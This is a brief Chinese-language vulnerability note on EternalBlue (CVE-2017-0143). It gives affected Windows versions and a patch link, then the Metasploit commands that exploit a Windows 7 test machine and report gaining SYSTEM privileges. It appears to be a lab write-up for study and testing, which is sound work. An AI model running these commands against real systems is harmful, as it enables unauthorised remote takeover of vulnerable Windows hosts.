CVE-2017-0143

描述

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网。大名鼎鼎的永恒之蓝漏洞

影响版本

ProductVersionUpdateEditionTested
Windows 10
Windows 101511
Windows 101607
Windows 7-SP1:heavy_check_mark:
Windows 8.1
Windows Rt 8.1-
Windows Server 2008-SP2
Windows Server 2008R2SP1
Windows Server 2012R2
Windows Server 2012Gold
Windows Server 2016
Windows VistaSP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143

利用方式

直接用msf就行,方便快捷,测试系统windows 7 sp1 x64

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.0.128
run

image-20200818114043309

并且权限是system的

image-20200818114925926